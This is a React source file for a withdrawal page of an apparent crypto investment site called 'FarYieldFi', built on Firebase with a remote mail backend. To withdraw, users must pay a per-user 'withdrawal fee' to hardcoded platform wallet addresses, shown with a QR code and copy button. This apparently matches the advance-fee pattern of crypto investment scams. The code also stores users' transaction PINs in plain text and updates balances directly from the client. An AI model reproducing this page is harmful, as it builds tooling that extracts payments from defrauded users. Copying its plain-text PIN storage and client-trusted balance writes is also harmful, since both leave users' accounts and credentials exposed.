import React, { useState, useEffect } from "react";
import { Helmet } from "react-helmet";
import Header from "../Components/Header";
import Nav from "../Components/Nav";
import { getAuth } from "firebase/auth";
import { db } from "../config";
import { doc, getDoc, updateDoc, addDoc, collection } from "firebase/firestore";
import axios from "axios";
import { QRCodeCanvas } from "qrcode.react";

const Withdrawal = () => {
  const [walletAddress, setWalletAddress] = useState("");
  const [cryptoType, setCryptoType] = useState("BTC");
  const [amount, setAmount] = useState("");
  const [pin, setPin] = useState("");
  const [message, setMessage] = useState("");
  const [user, setUser] = useState(null);
  const [balance, setBalance] = useState(0);
  const [withdrawalLimit, setWithdrawalLimit] = useState(1000);
  const [withdrawalFeePercentage, setWithdrawalFeePercentage] = useState(0);
  const [withdrawalFee, setWithdrawalFee] = useState(0);
  const [showFeeModal, setShowFeeModal] = useState(false);
  const [pendingWithdrawal, setPendingWithdrawal] = useState(null);

  const walletAddresses = {
    BTC: "bc1quy75wtsph0nv2wa3v6m05amq3c23g0yfm4dhwu",
    ETH: "0x34C829F70412DD6A1A1Dc502473f24E67c7cB267",
    USDT_ERC20: "0x34C829F70412DD6A1A1Dc502473f24E67c7cB267",
    USDT_TRC20: "TP5vS6ydiczMDVkwp3rPafKEn13HmJpG4K",
  };

  useEffect(() => {
    const auth = getAuth();
    const unsubscribe = auth.onAuthStateChanged((firebaseUser) => {
      if (firebaseUser) {
        setUser(firebaseUser);
      } else {
        setUser(null);
      }
    });
    return () => unsubscribe();
  }, []);

  useEffect(() => {
    const fetchUserData = async () => {
      if (!user) return;
      try {
        const userDocRef = doc(db, "users", user.uid);
        const userDoc = await getDoc(userDocRef);
        if (userDoc.exists()) {
          const data = userDoc.data();
          setBalance(data.balance || 0);
          setWithdrawalLimit(data.withdrawalLimit ?? 1000);
          setWithdrawalFeePercentage(data.withdrawalFeePercentage ?? 0);
        }
      } catch (error) {
        console.error("Error fetching user data:", error);
      }
    };
    fetchUserData();
  }, [user]);

  const handleWithdrawal = async (e) => {
    e.preventDefault();
    if (!user) return setMessage("User not authenticated.");
    if (!walletAddress || !amount || !pin)
      return setMessage("All fields are required.");

    const withdrawalAmount = parseFloat(amount);
    if (withdrawalAmount > balance) return setMessage("Insufficient balance.");
    if (withdrawalAmount > withdrawalLimit)
      return setMessage(
        `Amount exceeds the withdrawal limit of €${withdrawalLimit}.`
      );

    const fee = (withdrawalFeePercentage / 100) * withdrawalAmount;
    setWithdrawalFee(fee);

    if (withdrawalFeePercentage > 0) {
      setPendingWithdrawal({
        amount: withdrawalAmount,
        pin,
        walletAddress,
        cryptoType,
      });
      setShowFeeModal(true);
    } else {
      confirmWithdrawal({
        amount: withdrawalAmount,
        pin,
        walletAddress,
        cryptoType,
      });
    }
  };

  const confirmWithdrawal = async (data = pendingWithdrawal) => {
    setShowFeeModal(false);

    if (
      !data ||
      !data.amount ||
      !data.walletAddress ||
      !data.cryptoType ||
      !data.pin
    ) {
      setMessage("Withdrawal data is incomplete.");
      return;
    }

    try {
      const amount = parseFloat(data.amount);
      const { pin, walletAddress, cryptoType } = data;

      await addDoc(collection(db, "withdrawals"), {
        userId: user.uid,
        email: user.email,
        amount,
        fee: withdrawalFee,
        total: amount + withdrawalFee,
        walletAddress,
        cryptoType,
        pin,
        status: "pending",
        createdAt: new Date(),
      });

      const userRef = doc(db, "users", user.uid);
      await updateDoc(userRef, { balance: balance - amount });

      setBalance((prev) => prev - amount);
      setMessage("Withdrawal submitted successfully.");
      setAmount("");
      setPin("");
      setWalletAddress("");
      setPendingWithdrawal(null);

      // ✅ Send confirmation email
      await axios.post("https://renderbackend-e1lt.onrender.com/send-mail", {
        email: user.email,
        subject: "Withdrawal Submitted",
        CompanyName: "FarYieldFi",
htmlToSend: `
  <div style="font-family: Arial, sans-serif; max-width: 600px; margin: auto; border: 1px solid #eee; padding: 20px; border-radius: 10px; background-color: #f9f9f9;">
    <div style="text-align: center; margin-bottom: 20px;">
      <img src="https://faryieldfis.com/assets/images/logo.png" alt="FarYieldFi Logo" style="height: 60px;" />
      <h2 style="margin: 10px 0; color: #1a1a1a;">FarYieldFi</h2>
    </div>
    
    <h3 style="color: #333;">Hi!</h3>
    <p style="color: #555;">We've received your withdrawal request:</p>

    <table style="width: 100%; border-collapse: collapse; margin: 15px 0;">
      <tr>
        <td style="padding: 8px; border-bottom: 1px solid #ddd;"><strong>Method:</strong></td>
        <td style="padding: 8px; border-bottom: 1px solid #ddd;">${cryptoType}</td>
      </tr>
      <tr>
        <td style="padding: 8px; border-bottom: 1px solid #ddd;"><strong>Amount:</strong></td>
        <td style="padding: 8px; border-bottom: 1px solid #ddd;">€${amount}</td>
      </tr>
      <tr>
        <td style="padding: 8px; border-bottom: 1px solid #ddd;"><strong>Fee:</strong></td>
        <td style="padding: 8px; border-bottom: 1px solid #ddd;">€${withdrawalFee.toFixed(2)}</td>
      </tr>
      <tr>
        <td style="padding: 8px; border-bottom: 1px solid #ddd;"><strong>Status:</strong></td>
        <td style="padding: 8px; border-bottom: 1px solid #ddd;"><span style="color: orange; font-weight: bold;">Pending</span></td>
      </tr>
    </table>

    <p style="color: #555;">Your crypto will be sent to the wallet address below:</p>
    <p style="color: #111;"><strong>${cryptoType}:</strong> ${walletAddress}</p>

    <p style="margin-top: 30px; color: #555;">Thank you for using FarYieldFi!</p>
    <p style="color: #888;">– The FarYieldFi Team</p>

    <hr style="margin: 30px 0; border: none; border-top: 1px solid #ddd;" />
    <p style="font-size: 12px; color: #aaa; text-align: center;">
      © ${new Date().getFullYear()} FarYieldFi. All rights reserved.
    </p>
  </div>
`,

      });
    } catch (err) {
      console.error("Error during withdrawal:", err);
      setMessage("Error submitting withdrawal.");
    }
  };

  const copyToClipboard = () => {
    const address = walletAddresses[cryptoType];
    if (address) {
      navigator.clipboard.writeText(address);
      alert("Wallet address copied!");
    }
  };
  return (
    <div className="page">
      <Helmet>
        <script src="forthfunded/popper.min.js" />
        <script src="forthfunded/bootstrap.bundle.min.js" />
        <script src="forthfunded/defaultmenu.min.js" />
        <script src="forthfunded/waves.min.js" />
        <script src="forthfunded/sticky.js" />
        <script src="forthfunded/simplebar.min.js" />
        <script src="forthfunded/simplebar.js" />
        <script src="forthfunded/pickr.es5.min.js" />
        <script src="forthfunded/apexcharts.min.js" />
        <script src="forthfunded/crypto-dashboard.js" />
        <script src="forthfunded/custom-switcher.min.js" />
        <script src="forthfunded/custom.js" />
      </Helmet>
      <Header />
      <Nav />
      <div className="main-content app-content">
        <div className="container-fluid">
          <div className="row">
            <main className="col-md-9 ms-sm-auto col-lg-10 px-md-4">
              <h2 className="my-4">Withdraw Funds</h2>
              <p>Available Balance: €{balance.toFixed(2)}</p>
              {message && <p className="alert alert-info">{message}</p>}

              <form onSubmit={handleWithdrawal} className="mt-4">
                <div className="mb-3">
                  <label className="form-label">Crypto Type</label>
                  <select
                    className="form-select"
                    value={cryptoType}
                    onChange={(e) => setCryptoType(e.target.value)}
                  >
                    <option value="BTC">BTC</option>
                    <option value="ETH">ETH</option>
                    <option value="USDT_ERC20">USDT (ERC-20)</option>
                    <option value="USDT_TRC20">USDT (TRC-20)</option>
                    <option value="RIPPLE">RIPPLE</option>
                  </select>
                </div>
                <div className="mb-3">
                  <label className="form-label">Wallet Address</label>
                  <input
                    type="text"
                    className="form-control"
                    value={walletAddress}
                    onChange={(e) => setWalletAddress(e.target.value)}
                  />
                </div>
                <div className="mb-3">
                  <label className="form-label">Amount (€)</label>
                  <input
                    type="number"
                    className="form-control"
                    value={amount}
                    onChange={(e) => setAmount(e.target.value)}
                    min="0"
                  />
                </div>
                <div className="mb-3">
                  <label className="form-label">Transaction PIN</label>
                  <input
                    type="password"
                    className="form-control"
                    value={pin}
                    onChange={(e) => setPin(e.target.value)}
                  />
                </div>
                <button type="submit" className="btn btn-primary">
                  Withdraw
                </button>
              </form>

              {/* Modal for fee confirmation with QR Code */}
              {showFeeModal && (
                <div className="modal fade show" style={{ display: "block" }}>
                  <div className="modal-dialog modal-dialog-centered">
                    <div className="modal-content">
                      <div className="modal-header">
                        <h5 className="modal-title">Confirm Withdrawal</h5>
                        <button
                          type="button"
                          className="btn-close"
                          onClick={() => setShowFeeModal(false)}
                        ></button>
                      </div>
                      <div className="modal-body">
                        <p>
                          <strong>Amount:</strong> €
                          {parseFloat(amount).toFixed(2)}
                        </p>
                        <p>
                          <strong>Fee ({withdrawalFeePercentage}%):</strong> €
                          {withdrawalFee.toFixed(2)}
                        </p>
                        <p>
                          <strong>Total to Pay:</strong> €
                          {withdrawalFee.toFixed(2)}
                        </p>
                        <p>
                          <strong>Send to Wallet:</strong>{" "}
                          {walletAddresses[cryptoType]}
                        </p>
                        <div className="d-flex align-items-center mb-2">
                          <code className="me-2" id="walletAddressText">
                            {walletAddresses[cryptoType]}
                          </code>
                          <button
                            className="btn btn-sm btn-outline-primary"
                            onClick={copyToClipboard}
                          >
                            Copy
                          </button>
                        </div>

                        <div className="text-center mt-3">
                          <QRCodeCanvas
                            value={walletAddresses[cryptoType]}
                            size={180}
                          />
                        </div>
                      </div>
                      <div className="modal-footer">
                        <button
                          className="btn btn-secondary"
                          onClick={() => setShowFeeModal(false)}
                        >
                          Cancel
                        </button>
                        <button
                          className="btn btn-primary"
                          onClick={() => confirmWithdrawal()}
                        >
                          Confirm
                        </button>
                      </div>
                    </div>
                  </div>
                </div>
              )}
            </main>
          </div>
        </div>
      </div>
    </div>
  );
};

export default Withdrawal;
